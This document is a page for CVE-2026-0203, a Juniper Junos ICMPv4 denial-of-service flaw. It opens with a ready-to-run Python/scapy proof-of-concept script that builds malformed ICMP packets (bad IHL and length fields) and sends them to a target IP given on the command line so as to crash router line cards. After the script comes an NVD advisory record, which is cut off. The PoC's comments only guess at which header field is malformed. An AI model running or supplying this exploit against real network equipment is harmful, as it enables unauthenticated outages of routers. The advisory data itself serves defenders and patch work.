CVE-2026-0203

#!/usr/bin/env python3 # CVE-2026-0203 PoC - Malformed ICMPv4 Packet Generator # This PoC demonstrates generating a malformed ICMPv4 packet # that can trigger FPC crash in vulnerable Juniper JunOS devices from scapy.all import IP, ICMP, send import sys def create_malformed_icmp_packet(): """ Create a malformed ICMP packet with invalid IP header values to trigger improper handling in Juniper JunOS FPC """ # Create IP layer with malformed header # Invalid IP length or malformed header fields ip_packet = IP( version=4, ihl=6, # Invalid IHL value (should be 5 for standard header) tos=0, len=100, # Malformed total length id=0x1234, flags=0, frag=0, ttl=64, proto=1, # ICMP protocol src="192.168.1.100", dst="10.0.0.1" ) # Create ICMP echo request with payload icmp_packet = ICMP( type=8, # Echo request code=0, id=0x1234, seq=1 ) # Combine layers packet = ip_packet / icmp_packet / ("A" * 64) return packet def send_exploit(target_ip, packet_count=10): """ Send malformed ICMP packets to target Args: target_ip: Target Juniper device IP address packet_count: Number of packets to send """ print(f"[*] Generating malformed ICMPv4 packets...") packet = create_malformed_icmp_packet() packet.show() print(f"[*] Sending {packet_count} malformed packets to {target_ip}...") for i in range(packet_count): try: send(packet, verbose=0) print(f"[+] Packet {i+1}/{packet_count} sent") except Exception as e: print(f"[-] Error sending packet: {e}") print("[*] Attack complete") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python3 cve-2026-0203-poc.py <target_ip>") print("Example: python3 cve-2026-0203-poc.py 10.0.0.1") sys.exit(1) target = sys.argv[1] send_exploit(target)

{"cve": {"id": "CVE-2026-0203", "sourceIdentifier": "[email protected]", "published": "2026-01-15T21:16:05.457", "lastModified": "2026-03-10T23:16:43.090", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Handling of Exceptional Conditions vulnerability in packet processing of Juniper Networks Junos OS allows an unauthenticated, network-adjacent attacker sending a specifically malformed ICMP packet to cause an FPC to crash and restart, resulting in a Denial of Service (DoS).\n\n\n\nWhen an ICMP packet is received with a specifically malformed IP header value, the FPC receiving the packet crashes and restarts. Due to the specific type of malformed packet, adjacent upstream routers would not forward the packet, limiting the attack surface to adjacent networks.\n\nThis issue only affects ICMPv4. ICMPv6 is not vulnerable to this issue.\n\nThis issue does not affect AFT-based line cards such as the MPC10, MPC11, LC4800, LC9600, and MX304.\n\nThis issue affects Junos OS: \n\n\n\n * all versions before 21.2R3-S9, \n * from 21.4 before 21.4R3-S10, \n * from 22.2 before 22.2R3-S7, \n * from 22.3 before 22.3R3-S4, \n * from 22.4 before 22.4R3-S5, \n * from 23.2 before 23.2R2-S3, \n * from 23.4 before 23.4R2-S3, \n * from 24.2 before 24.2R1-S2, 24.2R2."}, {"lang": "es", "value": "Una vulnerabilidad de manejo inadecuado de condiciones excepcionales en el procesamiento de paquetes de Juniper Networks Junos OS permite a un atacante no autenticado y adyacente a la red enviar un paquete ICMP específicamente malformado para causar que una FPC se bloquee y se reinicie, lo que resulta en una denegación de servicio (DoS).\n\nCuando se recibe un paquete ICMP con un valor de encabezado IP específicamente malformado, la FPC que recibe el paquete se bloquea y se reinicia. Debido al tipo específico de paquete malformado, los routers ascendentes adyacentes no reenviarían el paquete, lo que limita la superficie de ataque a las redes adyacentes.\n\nEste problema solo afecta a ICMPv4. ICMPv6 no es vulnerable a este problema.\n\nEste problema afecta a Junos OS:\n\n * todas las versiones anteriores a 21.2R3-S9,\n * desde 21.4 antes de 21.4R3-S10,\n * desde 22.2 antes de 22.2R3-S7,\n * desde 22.3 antes de 22.3R3-S4,\n * desde 22.4 antes de 22.4R3-S5,\n * desde 23.2 antes de 23.2R2-S3,\n * desde 23.4 antes de 23.4R2-S3,\n * desde 24.2 antes de 24.2R1-S2, 24.2R2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:A/V:X/RE:M/U:Amber", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "AUTOMATIC", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "AMBER"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-755"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*", "versionEndExcluding": "21.2", "matchCriteriaId": "331C0F12-D9B9-483B-9EF0-28E48ED8346D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:21.2:-:*:*:*:*:*:*", "matchCriteriaId": "216E7DDE-453D-481F-92E2-9F8466CDDA3F"}, {"vulnerab ... (truncated)